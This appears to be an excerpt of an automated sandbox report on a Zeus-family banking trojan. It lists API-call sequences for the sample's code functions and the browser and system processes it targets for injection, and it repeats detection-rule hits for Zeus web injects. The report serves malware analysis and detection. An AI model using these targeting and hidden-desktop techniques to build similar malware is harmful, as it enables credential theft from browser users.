    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,CreateMutexA,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,St
rStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \firefox.exe6_2_00896CA0
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,CreateMutexA,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,St
rStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \tbb-firefox.exe6_2_00896CA0
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: GetCommandLineA,StrStrIA,memset,#680,LoadLibraryExA,GetProcAddress,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,strstr,strstr,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree, \iexplore.exe6_2_00891900
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: memset,GetModuleFileNameA,CreateMutexA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,#680,#680,PathFindFileNameA,StrStrIA,#680,StrStrIA,#680,StrStrIA, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex6_2_00883610
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,HeapAlloc,LeaveCriticalSection,Process32Next,GetHandleInformation,CloseHandle, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex9_2_02BE78A0
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,CreateMutexA,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,St
rStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \chrome.exe9_2_02BE6CA0
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,CreateMutexA,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,St
rStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \iexplore.exe9_2_02BE6CA0
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,CreateMutexA,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,St
rStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \firefox.exe9_2_02BE6CA0
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,CreateMutexA,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,St
rStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \tbb-firefox.exe9_2_02BE6CA0
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: GetCommandLineA,StrStrIA,memset,#680,LoadLibraryExA,GetProcAddress,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,strstr,strstr,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree, \iexplore.exe9_2_02BE1900
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: memset,GetModuleFileNameA,CreateMutexA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,#680,#680,PathFindFileNameA,StrStrIA,#680,StrStrIA,#680,StrStrIA, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex9_2_02BD3610
    Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02BB95B0 CreateDesktopA,SetThreadDesktop,memset,SHGetFolderPathA,PathAppendA,CreateProcessA,GetShellWindow,GetShellWindow,Sleep,Sleep,GetShellWindow,GetHandleInformation,CloseHandle,GetHandleInformation,CloseHandle,GetDesktopWindow,FindWindowA,RegisterWindowMessageA,CreateThread,GetHandleInformation,CloseHandle,SetThreadDesktop,memset,SHGetFolderPathA,PathAppendA,CreateProcessA,GetShellWindow,GetShellWindow,Sleep,Sleep,GetShellWindow,GetHandleInformation,GetHandleInformation,CloseHandle,GetHandleInformation,CloseHandle,GetDesktopWindow,FindWindowA,CreateThread,GetHandleInformation,CloseHandle,SetEvent,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,2_2_02BB95B0

    System Summary

    Source: 2.3.svchost.exe.2c70000.17.raw.unpack, type: UNPACKEDPE Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 2.3.svchost.exe.2c70000.10.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 2.3.svchost.exe.883000.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 2.3.svchost.exe.889000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 20.2.tGYLgZxMWmmBTD.exe.2172000.1.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 2.3.svchost.exe.2c70000.39.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 22.2.tGYLgZxMWmmBTD.exe.1280000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 2.3.svchost.exe.2c70000.38.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 2.3.svchost.exe.2c70000.22.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 26.2.tGYLgZxMWmmBTD.exe.12e2000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 39.2.tGYLgZxMWmmBTD.exe.cb2000.1.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 24.2.tGYLgZxMWmmBTD.exe.a30000.2.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 2.3.svchost.exe.2c70000.13.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 2.3.svchost.exe.2c70000.50.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 20.2.tGYLgZxMWmmBTD.exe.2560000.2.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 6.2.tGYLgZxMWmmBTD.exe.880000.2.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 17.2.tGYLgZxMWmmBTD.exe.e70000.2.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 2.3.svchost.exe.2c70000.8.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 2.2.svchost.exe.2a02000.3.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 22.2.tGYLgZxMWmmBTD.exe.1222000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 34.2.tGYLgZxMWmmBTD.exe.2742000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 2.3.svchost.exe.2c70000.53.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 2.3.svchost.exe.2c70000.11.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 13.2.tGYLgZxMWmmBTD.exe.d72000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 2.3.svchost.exe.2c70000.49.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 2.3.svchost.exe.2c70000.19.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 2.3.svchost.exe.2c70000.23.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 2.3.svchost.exe.2c70000.52.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 29.2.tGYLgZxMWmmBTD.exe.a42000.1.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 2.3.svchost.exe.888400.2.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 2.3.svchost.exe.2c70000.42.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 39.2.tGYLgZxMWmmBTD.exe.28f0000.2.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 29.2.tGYLgZxMWmmBTD.exe.a42000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 2.3.svchost.exe.2c70000.31.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 24.2.tGYLgZxMWmmBTD.exe.a30000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 2.3.svchost.exe.2c70000.32.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 39.2.tGYLgZxMWmmBTD.exe.cb2000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 2.3.svchost.exe.2c70000.33.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 2.3.svchost.exe.2c70000.49.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 20.2.tGYLgZxMWmmBTD.exe.2560000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 0.2.arxtPs1STE.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 2.3.svchost.exe.2c70000.10.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 2.3.svchost.exe.888400.3.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 2.3.svchost.exe.2c70000.17.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 2.2.svchost.exe.2bb0000.6.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 2.3.svchost.exe.2c70000.53.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 13.2.tGYLgZxMWmmBTD.exe.dd0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 2.3.svchost.exe.2c70000.37.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 2.3.svchost.exe.2c70000.26.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 2.3.svchost.exe.2c70000.26.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 2.3.svchost.exe.2c70000.35.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 2.3.svchost.exe.2c70000.44.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 2.3.svchost.exe.2c70000.48.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 2.2.svchost.exe.407000.0.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 5.2.tGYLgZxMWmmBTD.exe.872000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
